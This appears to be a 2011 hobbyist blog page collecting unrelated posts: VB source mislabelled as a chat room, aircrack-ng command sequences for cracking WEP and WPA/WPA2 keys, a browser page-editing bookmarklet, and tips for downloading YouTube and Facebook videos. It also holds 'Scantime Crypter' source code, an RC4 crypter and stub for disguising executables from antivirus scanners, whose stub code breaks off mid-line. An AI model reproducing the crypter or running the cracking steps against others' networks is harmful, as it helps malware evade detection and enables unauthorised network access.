Tuesday, May 17, 2011

web browser


VB - Private Chat room SOURCE CODE
http://www.youtube.com/sterg1hot
This software created with C4F Vista P2P Toolkit and this code below with visual basic 2008. Have fun :)
Public Class Form1

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

End Sub

Private Sub Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button3.Click
TextBox1.Text = ""
TextBox2.Text = ""
End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim Val As String = Nothing
Dim Result As New System.Text.StringBuilder
For Each Character As Byte In System.Text.ASCIIEncoding.ASCII.GetBytes(TextBox1.Text)
Result.Append(Convert.ToString(Character, 2).PadLeft(8, "0"))
Result.Append(" ")
Next
Val = Result.ToString.Substring(0, Result.ToString.Length - 1)
TextBox2.Text = Val
End Sub

Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
Dim Val As String = Nothing
Dim Characters As String = System.Text.RegularExpressions.Regex.Replace(TextBox1.Text, "[^01]", "")
Dim ByteArray((Characters.Length / 8) - 1) As Byte
For Index As Integer = 0 To ByteArray.Length - 1
ByteArray(Index) = Convert.ToByte(Characters.Substring(Index * 8, 8), 2)
Next
Val = System.Text.ASCIIEncoding.ASCII.GetString(ByteArray)
TextBox2.Text = Val
End Sub

Private Sub Button4_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button4.Click
MsgBox("This Software is made by Chaosss")
End Sub
End Class

Enjoy :)))
 
Backtrack4 Wep Key Recovery
 
There are too many methods to test you wireless key, I show one of them. For more visit: http://www.aircrack-ng.org/
 
airmon-ng start (interface)
airodump-ng --encrypt wep (interface)
airodump-ng -w capture -c (channel) --bssid (bssid)(interface)
aireplay-ng -1 0 -a (bssid) (interface)
aireplay-ng -3 -b (bssid) (interface)
aircrack-ng capture-01.cap
Done!!!
 
Backtrack4 Wpa/Wpa2 Key Recovery

 
There are too many methods to test you wireless key, I show one of them. For more visit: http://www.aircrack-ng.org/
 
airmon-ng start (interface)
airodump-ng --encrypt wpa (interface)
airodump-ng -c (channel) -w capture --output-format ivs (interface)
aireplay-ng -0 1 -a (bssid) -c (station Mac) (interface)
aircrack-ng -w passwordlist capture-01.ivs
 
Done!!!
 
How To Edit Any Web Page To Your Browser
Copy - paste this script to your browser and edit any website for fun.
 
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
 
Scantime Crypter VB 2008 Source Code
At first you need two forms one for Crypter and one for Stub
 
Crypter Code:
Imports System.Text
Public Class Form1

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

    End Sub

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim ofd As New OpenFileDialog
        If ofd.ShowDialog = Windows.Forms.DialogResult.OK Then
            TextBox1.Text = ofd.FileName
        Else : Exit Sub
        End If
    End Sub
    Public Shared Function rc4(ByVal message As String, ByVal password As String) As String
        Dim i As Integer = 0
        Dim j As Integer = 0
        Dim cipher As New System.Text.StringBuilder
        Dim returnCipher As String = String.Empty
        Dim sbox As Integer() = New Integer(256) {}
        Dim key As Integer() = New Integer(256) {}
        Dim intLength As Integer = password.Length
        Dim a As Integer = 0
        While a <= 255
            Dim ctmp As Char = (password.Substring((a Mod intLength), 1).ToCharArray()(0))
            key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp)
            sbox(a) = a
            System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
        End While
        Dim x As Integer = 0
        Dim b As Integer = 0
        While b <= 255
            x = (x + sbox(b) + key(b)) Mod 256
            Dim tempSwap As Integer = sbox(b)
            sbox(b) = sbox(x)
            sbox(x) = tempSwap
            System.Math.Max(System.Threading.Interlocked.Increment(b), b - 1)
        End While
        a = 1
        While a <= message.Length
            Dim itmp As Integer = 0
            i = (i + 1) Mod 256
            j = (j + sbox(i)) Mod 256
            itmp = sbox(i)
            sbox(i) = sbox(j)
            sbox(j) = itmp
            Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256)
            Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0)
            itmp = Asc(ctmp)
            Dim cipherby As Integer = itmp Xor k
            cipher.Append(Chr(cipherby))
            System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
        End While
        returnCipher = cipher.ToString
        cipher.Length = 0
        Return returnCipher
    End Function

    Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
        Const filesplit = "name"
        Dim filein, filename, stub As String
        Dim sfd As New SaveFileDialog
        If sfd.ShowDialog = Windows.Forms.DialogResult.OK Then
            filename = sfd.FileName
        Else : Exit Sub
        End If
        FileOpen(1, TextBox1.Text, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
        filein = Space(LOF(1))
        FileGet(1, filein)
        FileClose(1)
        FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
        stub = Space(LOF(1))
        FileGet(1, stub)
        FileClose(1)
        FileOpen(1, filename, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
        FilePut(1, stub & filesplit & rc4(filein, "name"))
        FileClose(1)
        MsgBox("Crypted")
        Me.Close()
    End Sub
End Class

 
Stub Code:
 
Public Class Form1

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        Const filesplit = "name"
        On Error Resume Next
        Dim TPath As String = System.IO.Path.GetTempPath
        Dim file1, filezb4(), filezafter As String
        FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
        file1 = Space(LOF(1))
        FileGet(1, file1)
        FileClose(1)
        filezb4 = Split(file1, filesplit)
        filezafter = rc4(filezb4(1), "name")
        FileOpen(5, TPath & "\CryptedFile.exe"












EVERYTHING IS FREE HERE MAN! MOBILE CONTACT NUMBER: 08065533655 08095666950

Saturday, February 26, 2011

Downloading Youtube Video

Today, Am going to show you how to download ANY VIDEO OF YOUR CHOICE FROM YOUTUBE just as I have promised in my last post.

Youtube  allows online videos only which many can afford to pay for.
I was surfing the net when I came across this software that allows you download videos from youtube for free.
You do not need to fill any form before you can download it, it is totally free!

Get ready and let's start downloading from youtube now!

Go to google and search for ATUBE CATCHER, download it, it's free!
Install it on your system, create a shortcut on your dekstop, launch the softaware and lets start downloading.

Now, go to youtube , search for the video you want to download, copy the link and paste it on your  free  atube catcher, click on download to start downloading your long awaited video that youtube denied you.
Whao! We just defeated youtube!


You can still download youtube videos online  without any distraction from youtube, just keep reading and will know more about downloading from youtube  online.

Go to www.catchvideo.net and have fun with youtube videos

That 's interesting.

You can reach me on:
 08065533655


Tell Your FRIENDS and LOVED ones about this blog.
Do not forget to tell even your worst enemy (There is love in sharing).

Subscribe for you to get any of my post directly in your email.

Everything Here Is FREE!














Downloading Facebook Video/


Have you ever come across a video on facebook and wanted to have it on your hard disk? How did you feel when you could not have it on your computer? Do you ever wonder how you could download those videos directly to your PC and watch them offline? At the comfort of your home? when you are not connected to the internet? Just give a little of your time and I will show you how you can download any facebook video of your choice to  your PC without wasting your time waiting for the video to load especially when the Internet connection is very bad.


I download facebook videos using an addon (Greasemonkey), javascript( userscript) installed on my browser(Firefox). This is the first userscript to support downloading Facebook Videos and it adds features that Facebook refuses to implement.This  addon  lets users download  Facebook videos, and embed videos outside of Facebook!

 Do you still wonder where to download Greasemonkey from? Do not trouble yourself, it's here! Am assuming  you have mozilla installed on your PC already,Now,click on Tools --> Adds-On and enable Greasemonkey. Now close the firefox browser and restart firefox browser. Now If you are able to see glowing monkey at the bottom of the firefox browse, that means Greasemoneky was installed successfully and your browser is now ready to run userscript code.

Then go to http://userscripts.org/scripts/source/9789.user.js or click here. Once the script loads up, you should see a prompt that will ask you to install. Click on Install and that's all.

Restart your firefox browser and click on any facebook video you like.

To use on a video page, look under the video info beneath the video and to the right. You are given the option to download the .flv file which is only supported by a limited number of players. I use REAL PLAYER and  GOM PLAYER to play these videos
You can also search google for "FLV Player download". Once you finish downloading, you can then enjoy watching the video with your FLV supported media player even when you are not connected to the internet.

If you are not sure if you have flv supported media player,the CONVERT VIDEO option will be ok for you, though, seems like a long process to me.
This option will use Zamzar.com to convert your video to a different format. Once you have select a format to convert the video to enter your email. After a while you will receive an email from Zamzar with a link to download the converted video. If you want to share your video on other websites this script also provides that code, and if you want to change the size of how that video will appear you can use the "Customize Code" option. Using the script for videos on walls and in messages is similar. The same links and options instead appear beneath the videos.

If you encounter any problem with the installation process, do not hesitate to let me know using the comment form below so i can help you out asap. I will also appreciate it if you leave a comment to let me know that you got it right.


You can read more about this JavaScript here

CHECK BACK (Together with our friends) FOR MY NEW POST (Downloading Youtube Videos Without Paying  A Penny)


There is love in sharing. Invite your friends and loved ones here.
Everything  is free!